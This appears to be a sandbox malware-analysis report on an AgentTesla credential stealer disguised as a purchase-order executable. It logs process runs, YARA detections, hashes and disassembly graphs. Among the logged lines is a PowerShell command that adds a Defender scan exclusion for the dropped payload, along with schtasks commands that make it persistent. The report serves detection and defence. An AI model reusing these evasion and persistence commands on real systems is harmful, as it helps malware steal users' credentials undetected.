                                                Start date:14/05/2022
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe
                                                Imagebase:0xf70000
                                                File size:430592 bytes
                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                General

                                                Target ID:5
                                                Start time:11:36:42
                                                Start date:14/05/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:6
                                                Start time:11:36:42
                                                Start date:14/05/2022
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp
                                                Imagebase:0xf50000
                                                File size:185856 bytes
                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:7
                                                Start time:11:36:44
                                                Start date:14/05/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:8
                                                Start time:11:36:45
                                                Start date:14/05/2022
                                                Path:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                Imagebase:0x2d0000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                General

                                                Target ID:9
                                                Start time:11:36:47
                                                Start date:14/05/2022
                                                Path:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                Imagebase:0x710000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.517206947.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.283648504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.283648504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.283045537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.283045537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.282465833.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.282465833.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.281949577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.281949577.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                General

                                                Target ID:20
                                                Start time:11:37:06
                                                Start date:14/05/2022
                                                Path:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe"
                                                Imagebase:0x810000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.359292860.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000014.00000002.359292860.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000014.00000002.355635331.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.358279749.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000014.00000002.358279749.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 62%, ReversingLabs
                                                Reputation:low

                                                General

                                                Target ID:22
                                                Start time:11:37:14
                                                Start date:14/05/2022
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp
                                                Imagebase:0xf50000
                                                File size:185856 bytes
                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:23
                                                Start time:11:37:14
                                                Start date:14/05/2022
                                                Path:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe"
                                                Imagebase:0x750000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.393985190.0000000003BEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000017.00000002.393985190.0000000003BEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000017.00000002.395811711.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000017.00000002.395811711.0000000003D12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000017.00000002.378427187.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                General

                                                Target ID:24
                                                Start time:11:37:15
                                                Start date:14/05/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:25
                                                Start time:11:37:16
                                                Start date:14/05/2022
                                                Path:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Imagebase:0x9b0000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000000.352037043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.517627144.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.510450291.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000002.510450291.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000000.351287356.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000000.351287356.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000000.350592858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000000.350592858.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000000.349995219.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000019.00000000.349995219.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                General

                                                Target ID:27
                                                Start time:11:37:26
                                                Start date:14/05/2022
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp2B32.tmp
                                                Imagebase:0xf50000
                                                File size:185856 bytes
                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:28
                                                Start time:11:37:26
                                                Start date:14/05/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c9170000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:29
                                                Start time:11:37:28
                                                Start date:14/05/2022
                                                Path:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                                                Imagebase:0x820000
                                                File size:677888 bytes
                                                MD5 hash:152EF22896BF39197D210D40171E898A
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000000.372079781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000000.372079781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000000.371351565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000000.371351565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.510451079.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000002.510451079.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000000.373291571.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000000.373291571.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000000.372700308.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000001D.00000000.372700308.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.518604895.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:12.3%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:60
                                                  Total number of Limit Nodes:3
                                                  execution_graph 14222 7aaa4f8 14223 7aaa683 14222->14223 14224 7aaa51e 14222->14224 14224->14223 14226 7aaa778 PostMessageW 14224->14226 14227 7aaa7e4 14226->14227 14227->14224 14152 2d4ded0 14153 2d4df12 14152->14153 14155 2d4df19 14152->14155 14154 2d4df6a CallWindowProcW 14153->14154 14153->14155 14154->14155 14156 2d43f98 14157 2d43fb2 14156->14157 14162 2d45568 14157->14162 14158 2d43fd3 14166 2d4376c 14158->14166 14163 2d45578 14162->14163 14164 2d45588 14163->14164 14173 2d45650 14163->14173 14164->14158 14167 2d43777 14166->14167 14168 2d45568 CreateActCtxA 14167->14168 14169 2d48369 14168->14169 14190 2d48652 14169->14190 14195 2d48660 14169->14195 14170 2d4838d 14174 2d45675 14173->14174 14178 2d45b50 14174->14178 14182 2d45b41 14174->14182 14179 2d45b77 14178->14179 14180 2d45c54 14179->14180 14186 2d457e4 14179->14186 14184 2d45b50 14182->14184 14183 2d45c54 14183->14183 14184->14183 14185 2d457e4 CreateActCtxA 14184->14185 14185->14183 14187 2d46be0 CreateActCtxA 14186->14187 14189 2d46ca3 14187->14189 14191 2d48660 14190->14191 14200 2d486a8 14191->14200 14205 2d4869a 14191->14205 14192 2d48687 14192->14170 14196 2d48677 14195->14196 14198 2d486a8 CreateActCtxA 14196->14198 14199 2d4869a CreateActCtxA 14196->14199 14197 2d48687 14197->14170 14198->14197 14199->14197 14201 2d486c5 14200->14201 14202 2d486de 14201->14202 14210 2d48778 14201->14210 14216 2d48768 14201->14216 14202->14192 14206 2d486a8 14205->14206 14207 2d486de 14206->14207 14208 2d48778 CreateActCtxA 14206->14208 14209 2d48768 CreateActCtxA 14206->14209 14207->14192 14208->14207 14209->14207 14211 2d48788 14210->14211 14212 2d45568 CreateActCtxA 14211->14212 14213 2d48798 14212->14213 14214 2d45568 CreateActCtxA 14213->14214 14215 2d487b3 14214->14215 14215->14202 14217 2d48778 14216->14217 14218 2d45568 CreateActCtxA 14217->14218 14219 2d48798 14218->14219 14220 2d45568 CreateActCtxA 14219->14220 14221 2d487b3 14220->14221 14221->14202

                                                  Executed Functions

                                                  Function 02D44358 Relevance: 2.2, Strings: 1, Instructions: 989COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 2d44358-2d44379 1 2d44380-2d44477 0->1 2 2d4437b 0->2 4 2d4447d-2d445dc 1->4 5 2d44b8f-2d44bb7 1->5 2->1 49 2d44b55-2d44b7f 4->49 50 2d445e2-2d4463d 4->50 8 2d452af-2d452b8 5->8 10 2d44bc5-2d44bce 8->10 11 2d452be-2d452d5 8->11 12 2d44bd5-2d44cc9 10->12 13 2d44bd0 10->13 32 2d44cf3 12->32 33 2d44ccb-2d44cd7 12->33 13->12 36 2d44cf9-2d44d19 32->36 34 2d44ce1-2d44ce7 33->34 35 2d44cd9-2d44cdf 33->35 38 2d44cf1 34->38 35->38 40 2d44d79-2d44df3 36->40 41 2d44d1b-2d44d74 36->41 38->36 60 2d44df5-2d44e48 40->60 61 2d44e4a-2d44e8d 40->61 53 2d452ac 41->53 63 2d44b81 49->63 64 2d44b8c 49->64 57 2d44642-2d4464d 50->57 58 2d4463f 50->58 53->8 62 2d44a67-2d44a6d 57->62 58->57 91 2d44e98-2d44ea1 60->91 61->91 65 2d44652-2d44670 62->65 66 2d44a73-2d44af0 62->66 63->64 64->5 68 2d446c7-2d446dc 65->68 69 2d44672-2d44676 65->69 108 2d44b3f-2d44b45 66->108 73 2d446e3-2d446f9 68->73 74 2d446de 68->74 69->68 71 2d44678-2d44683 69->71 78 2d446b9-2d446bf 71->78 75 2d44700-2d44717 73->75 76 2d446fb 73->76 74->73 80 2d4471e-2d44734 75->80 81 2d44719 75->81 76->75 83 2d44685-2d44689 78->83 84 2d446c1-2d446c2 78->84 87 2d44736 80->87 88 2d4473b-2d44742 80->88 81->80 85 2d4468f-2d446a7 83->85 86 2d4468b 83->86 90 2d44745-2d4496b 84->90 92 2d446ae-2d446b6 85->92 93 2d446a9 85->93 86->85 87->88 88->90 101 2d4496d-2d44971 90->101 102 2d449cf-2d449e4 90->102 95 2d44f01-2d44f10 91->95 92->78 93->92 96 2d44f12-2d44f9a 95->96 97 2d44ea3-2d44ecb 95->97 132 2d4511f-2d45128 96->132 99 2d44ed2-2d44efb 97->99 100 2d44ecd 97->100 99->95 100->99 101->102 107 2d44973-2d44982 101->107 104 2d449e6 102->104 105 2d449eb-2d44a0c 102->105 104->105 112 2d44a13-2d44a32 105->112 113 2d44a0e 105->113 114 2d449c1-2d449c7 107->114 110 2d44b47-2d44b4d 108->110 111 2d44af2-2d44b3c 108->111 110->49 111->108 118 2d44a34 112->118 119 2d44a39-2d44a59 112->119 113->112 115 2d44984-2d44988 114->115 116 2d449c9-2d449ca 114->116 120 2d44992-2d449b3 115->120 121 2d4498a-2d4498e 115->121 126 2d44a64 116->126 118->119 123 2d44a60 119->123 124 2d44a5b 119->124 127 2d449b5 120->127 128 2d449ba-2d449be 120->128 121->120 123->126 124->123 126->62 127->128 128->114 134 2d4512e-2d45189 132->134 135 2d44f9f-2d44fb4 132->135 150 2d451c0-2d451ea 134->150 151 2d4518b-2d451be 134->151 136 2d44fb6 135->136 137 2d44fbd-2d45113 135->137 136->137 139 2d45092-2d450d2 136->139 140 2d44fc3-2d45003 136->140 141 2d4504d-2d4508d 136->141 142 2d45008-2d45048 136->142 155 2d45119 137->155 139->155 140->155 141->155 142->155 159 2d451f3-2d45286 150->159 151->159 155->132 163 2d4528d-2d452a5 159->163 163->53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: UUUU
                                                  • API String ID: 0-1798160573
                                                  • Opcode ID: 95d41813a957dc2f1bcdaca7857baad3a067eb8b1494ebb38d35edf3b58fd846
                                                  • Instruction ID: eedd0ff3fe1312a84046799d5787991eeda3e95977a16184509a3ed6425f9b53
                                                  • Opcode Fuzzy Hash: 95d41813a957dc2f1bcdaca7857baad3a067eb8b1494ebb38d35edf3b58fd846
                                                  • Instruction Fuzzy Hash: E7A2B275A04228CFDB64CF69C984B99BBB2FF89304F1581E9D509AB325DB319E81CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07AAB338 Relevance: .6, Instructions: 634COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 577 7aab338-7aab35a 578 7aab70a-7aab70f 577->578 579 7aab360-7aab39b call 7aaaffc call 7aab00c call 7aab01c 577->579 580 7aab719-7aab71c 578->580 581 7aab711-7aab713 578->581 591 7aab3ae-7aab3ce 579->591 592 7aab39d-7aab3a7 579->592 584 7aab724-7aab72c 580->584 581->580 586 7aab732-7aab739 584->586 594 7aab3d0-7aab3da 591->594 595 7aab3e1-7aab401 591->595 592->591 594->595 597 7aab403-7aab40d 595->597 598 7aab414-7aab434 595->598 597->598 600 7aab436-7aab440 598->600 601 7aab447-7aab450 call 7aab02c 598->601 600->601 604 7aab452-7aab46d call 7aab02c 601->604 605 7aab474-7aab47d call 7aab03c 601->605 604->605 610 7aab47f-7aab49a call 7aab03c 605->610 611 7aab4a1-7aab4aa call 7aab04c 605->611 610->611 617 7aab4ac-7aab4b0 call 7aab05c 611->617 618 7aab4b5-7aab4d1 611->618 617->618 622 7aab4e9-7aab4ed 618->622 623 7aab4d3-7aab4d9 618->623 626 7aab4ef-7aab500 call 7aab06c 622->626 627 7aab507-7aab54f 622->627 624 7aab4db 623->624 625 7aab4dd-7aab4df 623->625 624->622 625->622 626->627 633 7aab573-7aab57a 627->633 634 7aab551 627->634 636 7aab57c-7aab58b 633->636 637 7aab591-7aab59f call 7aab07c 633->637 635 7aab554-7aab55a 634->635 638 7aab73a-7aab741 635->638 639 7aab560-7aab566 635->639 636->637 646 7aab5a9-7aab5d3 637->646 647 7aab5a1-7aab5a3 637->647 648 7aab6ec-7aab6f0 638->648 649 7aab743-7aab779 638->649 641 7aab568-7aab56a 639->641 642 7aab570-7aab571 639->642 641->642 642->633 642->635 659 7aab600-7aab61c 646->659 660 7aab5d5-7aab5e3 646->660 647->646 656 7aab6f1-7aab709 648->656 650 7aab77b-7aab79c 649->650 651 7aab7d8-7aab7e8 649->651 650->651 658 7aab79e-7aab7a4 650->658 661 7aab9be-7aab9c5 651->661 662 7aab7ee-7aab7f8 651->662 664 7aab7b2-7aab7b7 658->664 665 7aab7a6-7aab7a8 658->665 679 7aab61e-7aab628 659->679 680 7aab62f-7aab656 call 7aab08c 659->680 660->659 678 7aab5e5-7aab5f9 660->678 668 7aab9c7-7aab9cf call 7aab1b0 661->668 669 7aab9d4-7aab9e7 661->669 666 7aab7fa-7aab801 662->666 667 7aab802-7aab80c 662->667 670 7aab7b9-7aab7bd 664->670 671 7aab7c4-7aab7d1 664->671 665->664 674 7aab812-7aab852 667->674 675 7aab9f1-7aaba92 667->675 668->669 670->671 671->651 699 7aab86a-7aab86e 674->699 700 7aab854-7aab85a 674->700 730 7aaba99-7aabacf 675->730 731 7aaba94 675->731 678->659 679->680 690 7aab658-7aab65e 680->690 691 7aab66e-7aab672 680->691 693 7aab662-7aab664 690->693 694 7aab660 690->694 695 7aab68d-7aab6a9 691->695 696 7aab674-7aab686 691->696 693->691 694->691 708 7aab6ab-7aab6b1 695->708 709 7aab6c1-7aab6c5 695->709 696->695 705 7aab89b-7aab8b3 call 7aab1a0 699->705 706 7aab870-7aab895 699->706 703 7aab85e-7aab860 700->703 704 7aab85c 700->704 703->699 704->699 723 7aab8c0-7aab8c8 705->723 724 7aab8b5-7aab8ba 705->724 706->705 710 7aab6b3 708->710 711 7aab6b5-7aab6b7 708->711 709->586 713 7aab6c7-7aab6d5 709->713 710->709 711->709 720 7aab6e7-7aab6eb 713->720 721 7aab6d7-7aab6e5 713->721 720->648 721->656 721->720 726 7aab8ca-7aab8d8 723->726 727 7aab8de-7aab8fd 723->727 724->723 726->727 734 7aab8ff-7aab905 727->734 735 7aab915-7aab919 727->735 744 7aabad9 730->744 745 7aabad1 730->745 731->730 736 7aab909-7aab90b 734->736 737 7aab907 734->737 738 7aab91b-7aab928 735->738 739 7aab972-7aab9bb 735->739 736->735 737->735 747 7aab92a-7aab95c 738->747 748 7aab95e-7aab96b 738->748 739->661 749 7aabada 744->749 745->744 747->748 748->739 749->749
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.293735406.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7aa0000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d1a465365b229bf79f882cc5dd5ded3c587d710fd36437b502b085242a5ef19
                                                  • Instruction ID: 37a7ab1a2c206c05a63b961266633c29b5c81eca8963262ea4fd658e2cccd5d4
                                                  • Opcode Fuzzy Hash: 1d1a465365b229bf79f882cc5dd5ded3c587d710fd36437b502b085242a5ef19
                                                  • Instruction Fuzzy Hash: A032B9B0B01205AFDB19DB69C964BAEB7F6AFC9300F144469E516DB3A0CB35ED01CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D4BC20 Relevance: .2, Instructions: 229COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 879 2d4bc20-2d4bc7e 884 2d4bc80-2d4bcc9 879->884 885 2d4bccf-2d4bd06 call 2d4bf58 879->885 884->885 897 2d4befb-2d4bf1c 884->897 892 2d4be83-2d4beaa 885->892 893 2d4bd0c-2d4bd35 885->893 904 2d4beaf-2d4bed1 892->904 906 2d4bd3e-2d4bda2 893->906 907 2d4bed4-2d4bed7 897->907 904->907 920 2d4bda8-2d4bddd 906->920 921 2d4be59-2d4be60 906->921 908 2d4bedb-2d4bf24 907->908 917 2d4bf26 908->917 918 2d4bf2e 908->918 917->918 920->921 929 2d4bddf-2d4be11 920->929 921->908 922 2d4be62-2d4be81 921->922 922->904 929->921 933 2d4be13-2d4be4f 929->933 933->921
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.286077339.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d40000_Purchase order 450080088 proj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fd2ce8f4ac4b91d5cb4c151bb518644ee304b470a647a7438978903d5ad4f20d
                                                  • Instruction ID: 097f74c6bec8bfa5bea0b7251cc4b37c80827e7f83dd9e8c0cc9c735e108d9c8
                                                  • Opcode Fuzzy Hash: fd2ce8f4ac4b91d5cb4c151bb518644ee304b470a647a7438978903d5ad4f20d
                                                  • Instruction Fuzzy Hash: 8A917C34E103198FCB04DBE0D854ADEBBBABF99308F148615E516AF3A0EF70A945DB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02D457E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
